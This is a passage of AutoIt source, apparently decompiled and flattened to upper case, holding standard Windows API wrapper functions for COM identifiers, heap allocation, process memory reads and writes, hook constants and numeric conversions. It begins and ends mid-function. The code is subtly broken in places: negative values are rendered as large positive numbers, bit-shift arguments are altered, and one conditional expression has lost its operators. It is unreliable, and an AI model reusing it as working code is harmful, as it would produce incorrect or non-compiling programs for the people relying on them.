) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) IF $ARETURN [0 ] THEN RETURN SETERROR (10 , $ARETURN [0 ] , 0 ) RETURN $ARETURN [2 ] ENDFUNC FUNC _WINAPI_PROGIDFROMCLSID ($SCLSID ) LOCAL $TGUID = DLLSTRUCTCREATE ($__TAGWINAPICOM_GUID ) LOCAL $ARETURN = DLLCALL ("ole32.dll" , "uint" , "CLSIDFromString" , "wstr" , $SCLSID , "struct*" , $TGUID ) IF @ERROR OR $ARETURN [0 ] THEN RETURN SETERROR (@ERROR + 20 , @EXTENDED , "" ) $ARETURN = DLLCALL ("ole32.dll" , "uint" , "ProgIDFromCLSID" , "struct*" , $TGUID , "ptr*" , 0 ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , "" ) IF $ARETURN [0 ] THEN RETURN SETERROR (10 , $ARETURN [0 ] , "" ) LOCAL $SID = _WINAPI_GETSTRING ($ARETURN [2 ] ) _WINAPI_COTASKMEMFREE ($ARETURN [2 ] ) RETURN $SID ENDFUNC FUNC _WINAPI_RELEASESTREAM ($PSTREAM ) LOCAL $ARETURN = DLLCALL ("oleaut32.dll" , "long" , "DispCallFunc" , "ptr" , $PSTREAM , "ulong_ptr" , 8 * (1 + @AUTOITX64 ) , "uint" , 4 , "ushort" , 23 , "uint" , 0 , "ptr" , 0 , "ptr" , 0 , "str" , "" ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) IF $ARETURN [0 ] THEN RETURN SETERROR (10 , $ARETURN [0 ] , 0 ) RETURN 1 ENDFUNC #EndRegion Public Functions GLOBAL CONST $HGDI_ERROR = PTR (+ 4294967295 ) GLOBAL CONST $INVALID_HANDLE_VALUE = PTR (+ 4294967295 ) GLOBAL CONST $CLR_INVALID = + 4294967295 GLOBAL CONST $MB_PRECOMPOSED = 1 GLOBAL CONST $MB_COMPOSITE = 2 GLOBAL CONST $MB_USEGLYPHCHARS = 4 GLOBAL CONST $ULW_ALPHA = 2 GLOBAL CONST $ULW_COLORKEY = 1 GLOBAL CONST $ULW_OPAQUE = 4 GLOBAL CONST $ULW_EX_NORESIZE = 8 GLOBAL CONST $WH_CALLWNDPROC = 4 GLOBAL CONST $WH_CALLWNDPROCRET = 12 GLOBAL CONST $WH_CBT = 5 GLOBAL CONST $WH_DEBUG = 9 GLOBAL CONST $WH_FOREGROUNDIDLE = 11 GLOBAL CONST $WH_GETMESSAGE = 3 GLOBAL CONST $WH_JOURNALPLAYBACK = 1 GLOBAL CONST $WH_JOURNALRECORD = 0 GLOBAL CONST $WH_KEYBOARD = 2 GLOBAL CONST $WH_KEYBOARD_LL = 13 GLOBAL CONST $WH_MOUSE = 7 GLOBAL CONST $WH_MOUSE_LL = 14 GLOBAL CONST $WH_MSGFILTER = + 4294967295 GLOBAL CONST $WH_SHELL = 10 GLOBAL CONST $WH_SYSMSGFILTER = 6 GLOBAL CONST $WPF_ASYNCWINDOWPLACEMENT = 4 GLOBAL CONST $WPF_RESTORETOMAXIMIZED = 2 GLOBAL CONST $WPF_SETMINPOSITION = 1 GLOBAL CONST $KF_EXTENDED = 256 GLOBAL CONST $KF_ALTDOWN = 8192 GLOBAL CONST $KF_UP = 32768 GLOBAL CONST $LLKHF_EXTENDED = BITSHIFT ($KF_EXTENDED , 8 ) GLOBAL CONST $LLKHF_INJECTED = 16 GLOBAL CONST $LLKHF_ALTDOWN = BITSHIFT ($KF_ALTDOWN , 8 ) GLOBAL CONST $LLKHF_UP = BITSHIFT ($KF_UP , 8 ) GLOBAL CONST $OFN_ALLOWMULTISELECT = 512 GLOBAL CONST $OFN_CREATEPROMPT = 8192 GLOBAL CONST $OFN_DONTADDTORECENT = 33554432 GLOBAL CONST $OFN_ENABLEHOOK = 32 GLOBAL CONST $OFN_ENABLEINCLUDENOTIFY = 4194304 GLOBAL CONST $OFN_ENABLESIZING = 8388608 GLOBAL CONST $OFN_ENABLETEMPLATE = 64 GLOBAL CONST $OFN_ENABLETEMPLATEHANDLE = 128 GLOBAL CONST $OFN_EXPLORER = 524288 GLOBAL CONST $OFN_EXTENSIONDIFFERENT = 1024 GLOBAL CONST $OFN_FILEMUSTEXIST = 4096 GLOBAL CONST $OFN_FORCESHOWHIDDEN = 268435456 GLOBAL CONST $OFN_HIDEREADONLY = 4 GLOBAL CONST $OFN_LONGNAMES = 2097152 GLOBAL CONST $OFN_NOCHANGEDIR = 8 GLOBAL CONST $OFN_NODEREFERENCELINKS = 1048576 GLOBAL CONST $OFN_NOLONGNAMES = 262144 GLOBAL CONST $OFN_NONETWORKBUTTON = 131072 GLOBAL CONST $OFN_NOREADONLYRETURN = 32768 GLOBAL CONST $OFN_NOTESTFILECREATE = 65536 GLOBAL CONST $OFN_NOVALIDATE = 256 GLOBAL CONST $OFN_OVERWRITEPROMPT = 2 GLOBAL CONST $OFN_PATHMUSTEXIST = 2048 GLOBAL CONST $OFN_READONLY = 1 GLOBAL CONST $OFN_SHAREAWARE = 16384 GLOBAL CONST $OFN_SHOWHELP = 16 GLOBAL CONST $OFN_EX_NOPLACESBAR = 1 GLOBAL CONST $STD_CUT = 0 GLOBAL CONST $STD_COPY = 1 GLOBAL CONST $STD_PASTE = 2 GLOBAL CONST $STD_UNDO = 3 GLOBAL CONST $STD_REDOW = 4 GLOBAL CONST $STD_DELETE = 5 GLOBAL CONST $STD_FILENEW = 6 GLOBAL CONST $STD_FILEOPEN = 7 GLOBAL CONST $STD_FILESAVE = 8 GLOBAL CONST $STD_PRINTPRE = 9 GLOBAL CONST $STD_PROPERTIES = 10 GLOBAL CONST $STD_HELP = 11 GLOBAL CONST $STD_FIND = 12 GLOBAL CONST $STD_REPLACE = 13 GLOBAL CONST $STD_PRINT = 14 GLOBAL CONST $KB_SENDSPECIAL = 0 GLOBAL CONST $KB_SENDRAW = 1 GLOBAL CONST $KB_CAPSOFF = 0 GLOBAL CONST $KB_CAPSON = 1 GLOBAL CONST $S_OK = 0 GLOBAL CONST $E_ABORT = 2147500036 GLOBAL CONST $E_ACCESSDENIED = 2147942405 GLOBAL CONST $E_FAIL = 2147500037 GLOBAL CONST $E_HANDLE = 2147942406 GLOBAL CONST $E_INVALIDARG = 2147942487 GLOBAL CONST $E_NOINTERFACE = 2147500034 GLOBAL CONST $E_NOTIMPL = 2147500033 GLOBAL CONST $E_OUTOFMEMORY = 2147942414 GLOBAL CONST $E_POINTER = 2147500035 GLOBAL CONST $E_UNEXPECTED = 2147549183 #Region Global Variables and Constants GLOBAL $__G_HHEAP = 0 #EndRegion Global Variables and Constants #Region Functions list #EndRegion Functions list #Region Public Functions FUNC _WINAPI_CREATEBUFFER ($ILENGTH , $PBUFFER = 0 , $BABORT = TRUE ) $PBUFFER = __HEAPREALLOC ($PBUFFER , $ILENGTH , 0 , $BABORT ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $PBUFFER ENDFUNC FUNC _WINAPI_CREATEBUFFERFROMSTRUCT ($TSTRUCT , $PBUFFER = 0 , $BABORT = TRUE ) IF NOT ISDLLSTRUCT ($TSTRUCT ) THEN RETURN SETERROR (1 , 0 , 0 ) $PBUFFER = __HEAPREALLOC ($PBUFFER , DLLSTRUCTGETSIZE ($TSTRUCT ) , 0 , $BABORT ) IF @ERROR THEN RETURN SETERROR (@ERROR + 100 , @EXTENDED , 0 ) _WINAPI_MOVEMEMORY ($PBUFFER , $TSTRUCT , DLLSTRUCTGETSIZE ($TSTRUCT ) ) RETURN $PBUFFER ENDFUNC FUNC _WINAPI_CREATESTRING ($SSTRING , $PSTRING = 0 , $ILENGTH = + 4294967295 , $BUNICODE = TRUE , $BABORT = TRUE ) $ILENGTH = NUMBER ($ILENGTH ) IF $ILENGTH >= 0 THEN $SSTRING = STRINGLEFT ($SSTRING , $ILENGTH ) ELSE $ILENGTH = STRINGLEN ($SSTRING ) ENDIF LOCAL $ISIZE = $ILENGTH + 1 IF $BUNICODE THEN $ISIZE *= 2 ENDIF $PSTRING = __HEAPREALLOC ($PSTRING , $ISIZE , 0 , $BABORT ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) DLLSTRUCTSETDATA (DLLSTRUCTCREATE (($BUNICODE "wchar" "char" ) & "[" & ($ILENGTH + 1 ) & "]" , $PSTRING ) , 1 , $SSTRING ) RETURN SETEXTENDED ($ILENGTH , $PSTRING ) ENDFUNC FUNC _WINAPI_EQUALMEMORY ($PSOURCE1 , $PSOURCE2 , $ILENGTH ) IF _WINAPI_ISBADREADPTR ($PSOURCE1 , $ILENGTH ) THEN RETURN SETERROR (11 , @EXTENDED , 0 ) IF _WINAPI_ISBADREADPTR ($PSOURCE2 , $ILENGTH ) THEN RETURN SETERROR (12 , @EXTENDED , 0 ) LOCAL $ARET = DLLCALL ("ntdll.dll" , "ulong_ptr" , "RtlCompareMemory" , "struct*" , $PSOURCE1 , "struct*" , $PSOURCE2 , "ulong_ptr" , $ILENGTH ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN NUMBER ($ARET [0 ] = $ILENGTH ) ENDFUNC FUNC _WINAPI_FILLMEMORY ($PMEMORY , $ILENGTH , $IVALUE = 0 ) IF _WINAPI_ISBADWRITEPTR ($PMEMORY , $ILENGTH ) THEN RETURN SETERROR (11 , @EXTENDED , 0 ) DLLCALL ("ntdll.dll" , "none" , "RtlFillMemory" , "struct*" , $PMEMORY , "ulong_ptr" , $ILENGTH , "byte" , $IVALUE ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN 1 ENDFUNC FUNC _WINAPI_FREEMEMORY ($PMEMORY ) IF NOT __HEAPFREE ($PMEMORY , 1 ) THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN 1 ENDFUNC FUNC _WINAPI_GETMEMORYSIZE ($PMEMORY ) LOCAL $IRESULT = __HEAPSIZE ($PMEMORY , 1 ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $IRESULT ENDFUNC FUNC _WINAPI_GLOBALMEMORYSTATUS () LOCAL CONST $TAGMEMORYSTATUSEX = "dword Length;dword MemoryLoad;" & "uint64 TotalPhys;uint64 AvailPhys;uint64 TotalPageFile;uint64 AvailPageFile;" & "uint64 TotalVirtual;uint64 AvailVirtual;uint64 AvailExtendedVirtual" LOCAL $TMEM = DLLSTRUCTCREATE ($TAGMEMORYSTATUSEX ) DLLSTRUCTSETDATA ($TMEM , 1 , DLLSTRUCTGETSIZE ($TMEM ) ) LOCAL $ARET = DLLCALL ("kernel32.dll" , "bool" , "GlobalMemoryStatusEx" , "struct*" , $TMEM ) IF @ERROR OR NOT $ARET [0 ] THEN RETURN SETERROR (@ERROR + 10 , @EXTENDED , 0 ) LOCAL $AMEM [7 ] $AMEM [0 ] = DLLSTRUCTGETDATA ($TMEM , 2 ) $AMEM [1 ] = DLLSTRUCTGETDATA ($TMEM , 3 ) $AMEM [2 ] = DLLSTRUCTGETDATA ($TMEM , 4 ) $AMEM [3 ] = DLLSTRUCTGETDATA ($TMEM , 5 ) $AMEM [4 ] = DLLSTRUCTGETDATA ($TMEM , 6 ) $AMEM [5 ] = DLLSTRUCTGETDATA ($TMEM , 7 ) $AMEM [6 ] = DLLSTRUCTGETDATA ($TMEM , 8 ) RETURN $AMEM ENDFUNC FUNC _WINAPI_ISBADCODEPTR ($PADDRESS ) LOCAL $ARET = DLLCALL ("kernel32.dll" , "bool" , "IsBadCodePtr" , "struct*" , $PADDRESS ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_ISBADREADPTR ($PADDRESS , $ILENGTH ) LOCAL $ARET = DLLCALL ("kernel32.dll" , "bool" , "IsBadReadPtr" , "struct*" , $PADDRESS , "uint_ptr" , $ILENGTH ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_ISBADSTRINGPTR ($PADDRESS , $ILENGTH ) LOCAL $ARET = DLLCALL ("kernel32.dll" , "bool" , "IsBadStringPtr" , "struct*" , $PADDRESS , "uint_ptr" , $ILENGTH ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_ISBADWRITEPTR ($PADDRESS , $ILENGTH ) LOCAL $ARET = DLLCALL ("kernel32.dll" , "bool" , "IsBadWritePtr" , "struct*" , $PADDRESS , "uint_ptr" , $ILENGTH ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_ISMEMORY ($PMEMORY ) LOCAL $BRESULT = __HEAPVALIDATE ($PMEMORY ) RETURN SETERROR (@ERROR , @EXTENDED , $BRESULT ) ENDFUNC FUNC _WINAPI_LOCALFREE ($HMEMORY ) LOCAL $ARESULT = DLLCALL ("kernel32.dll" , "handle" , "LocalFree" , "handle" , $HMEMORY ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_MOVEMEMORY ($PDESTINATION , $PSOURCE , $ILENGTH ) IF _WINAPI_ISBADREADPTR ($PSOURCE , $ILENGTH ) THEN RETURN SETERROR (10 , @EXTENDED , 0 ) IF _WINAPI_ISBADWRITEPTR ($PDESTINATION , $ILENGTH ) THEN RETURN SETERROR (11 , @EXTENDED , 0 ) DLLCALL ("ntdll.dll" , "none" , "RtlMoveMemory" , "struct*" , $PDESTINATION , "struct*" , $PSOURCE , "ulong_ptr" , $ILENGTH ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN 1 ENDFUNC FUNC _WINAPI_READPROCESSMEMORY ($HPROCESS , $PBASEADDRESS , $PBUFFER , $ISIZE , BYREF $IREAD ) LOCAL $ARESULT = DLLCALL ("kernel32.dll" , "bool" , "ReadProcessMemory" , "handle" , $HPROCESS , "ptr" , $PBASEADDRESS , "struct*" , $PBUFFER , "ulong_ptr" , $ISIZE , "ulong_ptr*" , 0 ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) $IREAD = $ARESULT [5 ] RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_WRITEPROCESSMEMORY ($HPROCESS , $PBASEADDRESS , $PBUFFER , $ISIZE , BYREF $IWRITTEN , $SBUFFER = "ptr" ) LOCAL $ARESULT = DLLCALL ("kernel32.dll" , "bool" , "WriteProcessMemory" , "handle" , $HPROCESS , "ptr" , $PBASEADDRESS , $SBUFFER , $PBUFFER , "ulong_ptr" , $ISIZE , "ulong_ptr*" , 0 ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) $IWRITTEN = $ARESULT [5 ] RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_ZEROMEMORY ($PMEMORY , $ILENGTH ) IF _WINAPI_ISBADWRITEPTR ($PMEMORY , $ILENGTH ) THEN RETURN SETERROR (11 , @EXTENDED , 0 ) DLLCALL ("ntdll.dll" , "none" , "RtlZeroMemory" , "struct*" , $PMEMORY , "ulong_ptr" , $ILENGTH ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN 1 ENDFUNC #EndRegion Public Functions #Region Internal Functions FUNC __HEAPALLOC ($ISIZE , $BABORT = FALSE ) LOCAL $ARET IF NOT $__G_HHEAP THEN $ARET = DLLCALL ("kernel32.dll" , "handle" , "HeapCreate" , "dword" , 0 , "ulong_ptr" , 0 , "ulong_ptr" , 0 ) IF @ERROR OR NOT $ARET [0 ] THEN __FATALEXIT (1 , "Error allocating memory." ) $__G_HHEAP = $ARET [0 ] ENDIF $ARET = DLLCALL ("kernel32.dll" , "ptr" , "HeapAlloc" , "handle" , $__G_HHEAP , "dword" , 8 , "ulong_ptr" , $ISIZE ) IF @ERROR OR NOT $ARET [0 ] THEN IF $BABORT THEN __FATALEXIT (1 , "Error allocating memory." ) RETURN SETERROR (@ERROR + 30 , @EXTENDED , 0 ) ENDIF RETURN $ARET [0 ] ENDFUNC FUNC __HEAPFREE (BYREF $PMEMORY , $BCHECK = FALSE , $ICURERR = @ERROR , $ICUREXT = @EXTENDED ) IF $BCHECK AND (NOT __HEAPVALIDATE ($PMEMORY ) ) THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) LOCAL $ARET = DLLCALL ("kernel32.dll" , "int" , "HeapFree" , "handle" , $__G_HHEAP , "dword" , 0 , "ptr" , $PMEMORY ) IF @ERROR OR NOT $ARET [0 ] THEN RETURN SETERROR (@ERROR + 40 , @EXTENDED , 0 ) $PMEMORY = 0 RETURN SETERROR ($ICURERR , $ICUREXT , 1 ) ENDFUNC FUNC __HEAPREALLOC ($PMEMORY , $ISIZE , $BAMOUNT = FALSE , $BABORT = FALSE ) LOCAL $ARET , $PRET IF __HEAPVALIDATE ($PMEMORY ) THEN IF $BAMOUNT AND (__HEAPSIZE ($PMEMORY ) >= $ISIZE ) THEN RETURN SETEXTENDED (1 , PTR ($PMEMORY ) ) $ARET = DLLCALL ("kernel32.dll" , "ptr" , "HeapReAlloc" , "handle" , $__G_HHEAP , "dword" , 8 , "ptr" , $PMEMORY , "ulong_ptr" , $ISIZE ) IF @ERROR OR NOT $ARET [0 ] THEN IF $BABORT THEN __FATALEXIT (1 , "Error allocating memory." ) RETURN SETERROR (@ERROR + 20 , @EXTENDED , PTR ($PMEMORY ) ) ENDIF $PRET = $ARET [0 ] ELSE $PRET = __HEAPALLOC ($ISIZE , $BABORT ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) ENDIF RETURN $PRET ENDFUNC FUNC __HEAPSIZE ($PMEMORY , $BCHECK = FALSE ) IF $BCHECK AND (NOT __HEAPVALIDATE ($PMEMORY ) ) THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) LOCAL $ARET = DLLCALL ("kernel32.dll" , "ulong_ptr" , "HeapSize" , "handle" , $__G_HHEAP , "dword" , 0 , "ptr" , $PMEMORY ) IF @ERROR OR ($ARET [0 ] = PTR (+ 4294967295 ) ) THEN RETURN SETERROR (@ERROR + 50 , @EXTENDED , 0 ) RETURN $ARET [0 ] ENDFUNC FUNC __HEAPVALIDATE ($PMEMORY ) IF (NOT $__G_HHEAP ) OR (NOT PTR ($PMEMORY ) ) THEN RETURN SETERROR (9 , 0 , FALSE ) LOCAL $ARET = DLLCALL ("kernel32.dll" , "int" , "HeapValidate" , "handle" , $__G_HHEAP , "dword" , 0 , "ptr" , $PMEMORY ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARET [0 ] ENDFUNC #EndRegion Internal Functions GLOBAL CONST $SND_APPLICATION = 128 GLOBAL CONST $SND_ALIAS = 65536 GLOBAL CONST $SND_ALIAS_ID = 1114112 GLOBAL CONST $SND_ASYNC = 1 GLOBAL CONST $SND_FILENAME = 131072 GLOBAL CONST $SND_LOOP = 8 GLOBAL CONST $SND_MEMORY = 4 GLOBAL CONST $SND_NODEFAULT = 2 GLOBAL CONST $SND_NOSTOP = 16 GLOBAL CONST $SND_NOWAIT = 8192 GLOBAL CONST $SND_PURGE = 64 GLOBAL CONST $SND_RESOURCE = 262148 GLOBAL CONST $SND_SENTRY = 524288 GLOBAL CONST $SND_SYNC = 0 GLOBAL CONST $SND_SYSTEM = 2097152 GLOBAL CONST $SND_SYSTEM_NOSTOP = 2097168 GLOBAL CONST $SND_ALIAS_SYSTEMASTERISK = "SystemAsterisk" GLOBAL CONST $SND_ALIAS_SYSTEMDEFAULT = "SystemDefault" GLOBAL CONST $SND_ALIAS_SYSTEMEXCLAMATION = "SystemExclamation" GLOBAL CONST $SND_ALIAS_SYSTEMEXIT = "SystemExit" GLOBAL CONST $SND_ALIAS_SYSTEMHAND = "SystemHand" GLOBAL CONST $SND_ALIAS_SYSTEMQUESTION = "SystemQuestion" GLOBAL CONST $SND_ALIAS_SYSTEMSTART = "SystemStart" GLOBAL CONST $SND_ALIAS_SYSTEMWELCOME = "SystemWelcome" #Region Global Variables and Constants #EndRegion Global Variables and Constants #Region Functions list #EndRegion Functions list #Region Public Functions FUNC _WINAPI_CHARTOOEM ($SSTR ) LOCAL $ARET = DLLCALL ("user32.dll" , "bool" , "CharToOemW" , "wstr" , $SSTR , "wstr" , "" ) IF @ERROR OR NOT $ARET [0 ] THEN RETURN SETERROR (@ERROR + 10 , @EXTENDED , "" ) RETURN $ARET [2 ] ENDFUNC FUNC _WINAPI_CLIENTTOSCREEN ($HWND , BYREF $TPOINT ) LOCAL $ARET = DLLCALL ("user32.dll" , "bool" , "ClientToScreen" , "hwnd" , $HWND , "struct*" , $TPOINT ) IF @ERROR OR NOT $ARET [0 ] THEN RETURN SETERROR (@ERROR + 10 , @EXTENDED , 0 ) RETURN $TPOINT ENDFUNC FUNC _WINAPI_DWORDTOFLOAT ($IVALUE ) LOCAL $TDWORD = DLLSTRUCTCREATE ("dword" ) LOCAL $TFLOAT = DLLSTRUCTCREATE ("float" , DLLSTRUCTGETPTR ($TDWORD ) ) DLLSTRUCTSETDATA ($TDWORD , 1 , $IVALUE ) RETURN DLLSTRUCTGETDATA ($TFLOAT , 1 ) ENDFUNC FUNC _WINAPI_DWORDTOINT ($IVALUE ) LOCAL $TDATA = DLLSTRUCTCREATE ("int" ) DLLSTRUCTSETDATA ($TDATA , 1 , $IVALUE ) RETURN DLLSTRUCTGETDATA ($TDATA , 1 ) ENDFUNC FUNC _WINAPI_FLOATTODWORD ($IVALUE ) LOCAL $TFLOAT = DLLSTRUCTCREATE ("float" ) LOCAL $TDWORD = DLLSTRUCTCREATE ("dword" , DLLSTRUCTGETPTR ($TFLOAT ) ) DLLSTRUCTSETDATA ($TFLOAT , 1 , $IVALUE ) RETURN DLLSTRUCTGETDATA ($TDWORD , 1 ) ENDFUNC FUNC _WINAPI_FLOATTOINT ($NFLOAT ) LOCAL $TFLOAT = DLLSTRUCTCREATE ("float" ) LOCAL $TINT = DLLSTRUCTCREATE ("int" , DLLSTRUCTGETPTR ($TFLOAT ) ) DLLSTRUCTSETDATA ($TFLOAT , 1 , $NFLOAT ) RETURN DLLSTRUCTGETDATA ($TINT , 1 ) ENDFUNC FUNC _WINAPI_GETXYFROMPOINT (BYREF $TPOINT , BYREF $IX , BYREF $IY ) $IX = DLLSTRUCTGETDATA ($TPOINT , "X" ) $IY = DLLSTRUCTGETDATA ($TPOINT , "Y" ) ENDFUNC FUNC _WINAPI_GUIDFROMSTRING ($SGUID ) LOCAL $TGUID = DLLSTRUCTCREATE ($TAGGUID ) _WINAPI_GUIDFROMSTRINGEX ($SGUID , $TGUID ) IF @ERROR THEN RETURN SETERROR (@ERROR + 10 , @EXTENDED , 0 ) RETURN $TGUID ENDFUNC FUNC _WINAPI_GUIDFROMSTRINGEX ($SGUID , $TGUID ) LOCAL $ARESULT = DLLCALL ("ole32.dll" , "long" , "CLSIDFromString" , "wstr" , $SGUID , "struct*" , $TGUID ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_HASHDATA ($PMEMORY , $ISIZE , $ILENGTH = 32 ) IF ($ILENGTH <= 0 ) OR ($ILENGTH > 256 ) THEN RETURN SETERROR (11 , 0 , 0 ) LOCAL $TDATA = DLLSTRUCTCREATE ("byte[" & $ILENGTH & "]" ) LOCAL $ARET = DLLCALL ("shlwapi.dll" , "uint" , "HashData" , "struct*" , $PMEMORY , "dword" , $ISIZE , "struct*" , $TDATA , "dword" , $ILENGTH ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) IF $ARET [0 ] THEN RETURN SETERROR (10 , $ARET [0 ] , 0 ) RETURN DLLSTRUCTGETDATA ($TDATA , 1 ) ENDFUNC FUNC _WINAPI_HASHSTRING ($SSTRING , $BCASESENSITIVE = TRUE , $ILENGTH = 32 ) LOCAL $ILENGTHS = STRINGLEN ($SSTRING ) IF NOT $ILENGTHS OR ($ILENGTH > 256 ) THEN RETURN SETERROR (12 , 0 , 0 ) LOCAL $TSTRING = DLLSTRUCTCREATE ("wchar[" & ($ILENGTHS + 1 ) & "]" ) IF NOT $BCASESENSITIVE THEN $SSTRING = STRINGLOWER ($SSTRING ) ENDIF DLLSTRUCTSETDATA ($TSTRING , 1 , $SSTRING ) LOCAL $SHASH = _WINAPI_HASHDATA ($TSTRING , 2 * $ILENGTHS , $ILENGTH ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $SHASH ENDFUNC FUNC _WINAPI_HIBYTE ($IVALUE ) RETURN BITAND (BITSHIFT ($IVALUE , 8 ) , 255 ) ENDFUNC FUNC _WINAPI_HIDWORD ($IVALUE ) LOCAL $TINT64 = DLLSTRUCTCREATE ("int64" ) LOCAL $TQWORD = DLLSTRUCTCREATE ("dword;dword" , DLLSTRUCTGETPTR ($TINT64 ) ) DLLSTRUCTSETDATA ($TINT64 , 1 , $IVALUE ) RETURN DLLSTRUCTGETDATA ($TQWORD , 2 ) ENDFUNC FUNC _WINAPI_HIWORD ($ILONG ) RETURN BITSHIFT ($ILONG , 16 ) ENDFUNC FUNC _WINAPI_INTTODWORD ($IVALUE ) LOCAL $TDATA = DLLSTRUCTCREATE ("dword" ) DLLSTRUCTSETDATA ($TDATA , 1 , $IVALUE ) RETURN DLLSTRUCTGETDATA ($TDATA , 1 ) ENDFUNC FUNC _WINAPI_INTTOFLOAT ($IINT ) LOCAL $TINT = DLLSTRUCTCREATE ("int" ) LOCAL $TFLOAT = DLLSTRUCTCREATE ("float" , DLLSTRUCTGETPTR ($TINT ) ) DLLSTRUCTSETDATA ($TINT , 1 , $IINT ) RETURN DLLSTRUCTGETDATA ($TFLOAT , 1 ) ENDFUNC FUNC _WINAPI_LOBYTE ($IVALUE ) RETURN BITAND ($IVALUE , 255 ) ENDFUNC FUNC _WINAPI_LODWORD ($IVALUE ) LOCAL $TINT64 = DLLSTRUCTCREATE ("int64" ) LOCAL $TQWORD = DLLSTRUCTCREATE ("dword;dword" , DLLSTRUCTGETPTR ($TINT64 ) ) DLLSTRUCTSETDATA ($TINT64 , 1 , $IVALUE ) RETURN DLLSTRUCTGETDATA ($TQWORD , 1 ) ENDFUNC FUNC _WINAPI_LOWORD ($ILONG ) RETURN BITAND ($ILONG , 65535 ) ENDFUNC FUNC _WINAPI_LONGMID ($IVALUE , $ISTART , $ICOUNT ) RETURN BITAND (BITSHIFT ($IVALUE , $ISTART ) , BITOR (BITSHIFT (BITSHIFT (2147483647 , 32 - ($ICOUNT + 1 ) ) , 1 ) , BITSHIFT (1 , - ($ICOUNT + 4294967295 ) ) ) ) ENDFUNC FUNC _WINAPI_MAKELANGID ($ILNGIDPRIMARY , $ILNGIDSUB ) RETURN BITOR (BITSHIFT ($ILNGIDSUB , + 4294967286 ) , $ILNGIDPRIMARY ) ENDFUNC FUNC _WINAPI_MAKELCID ($ILNGID , $ISORTID ) RETURN BITOR (BITSHIFT ($ISORTID , + 4294967280 ) , $ILNGID ) ENDFUNC FUNC _WINAPI_MAKELONG ($ILO , $IHI ) RETURN BITOR (BITSHIFT ($IHI , + 4294967280 ) , BITAND ($ILO , 65535 ) ) ENDFUNC FUNC _WINAPI_MAKEQWORD ($ILODWORD , $IHIDWORD ) LOCAL $TINT64 = DLLSTRUCTCREATE ("uint64" ) LOCAL $TDWORDS = DLLSTRUCTCREATE ("dword;dword" , DLLSTRUCTGETPTR ($TINT64 ) ) DLLSTRUCTSETDATA ($TDWORDS , 1 , $ILODWORD ) DLLSTRUCTSETDATA ($TDWORDS , 2 , $IHIDWORD ) RETURN DLLSTRUCTGETDATA ($TINT64 , 1 ) ENDFUNC FUNC _WINAPI_MAKEWORD ($ILO , $IHI ) LOCAL $TWORD = DLLSTRUCTCREATE ("ushort" ) LOCAL $TBYTE = DLLSTRUCTCREATE ("byte;byte" , DLLSTRUCTGETPTR ($TWORD ) ) DLLSTRUCTSETDATA ($TBYTE , 1 , $IHI ) DLLSTRUCTSETDATA ($TBYTE , 2 , $ILO ) RETURN DLLSTRUCTGETDATA ($TWORD , 1 ) ENDFUNC FUNC _WINAPI_MULTIBYTETOWIDECHAR ($VTEXT , $ICODEPAGE = 0 , $IFLAGS = 0 , $BRETSTRING = FALSE ) LOCAL $STEXTTYPE = "str" IF NOT ISSTRING ($VTEXT ) THEN $STEXTTYPE = "struct*" LOCAL $ARESULT = DLLCALL ("kernel32.dll" , "int" , "MultiByteToWideChar" , "uint" , $ICODEPAGE , "dword" , $IFLAGS , $STEXTTYPE , $VTEXT , "int" , + 4294967295 , "ptr" , 0 , "int" , 0 ) IF @ERROR OR NOT $ARESULT [0 ] THEN RETURN SETERROR (@ERROR + 10 , @EXTENDED , 0 ) LOCAL $IOUT = $ARESULT [0 ] LOCAL $TOUT = DLLSTRUCTCREATE ("wchar[" & $IOUT & "]" ) $ARESULT = DLLCALL ("kernel32.dll" , "int" , "MultiByteToWideChar" , "uint" , $ICODEPAGE , "dword" , $IFLAGS , $STEXTTYPE , $VTEXT , "int" , + 4294967295 , "struct*" , $TOUT , "int" , $IOUT ) IF @ERROR OR NOT $ARESULT [0 ] THEN RETURN SETERROR (@ERROR + 20 , @EXTENDED , 0 ) IF $BRETSTRING THEN RETURN DLLSTRUCTGETDATA ($TOUT , 1 ) RETURN $TOUT ENDFUNC FUNC _WINAPI_MULTIBYTETOWIDECHAREX ($STEXT , $PTEXT , $ICODEPAGE = 0 , $IFLAGS = 0 ) LOCAL $ARESULT = DLLCALL 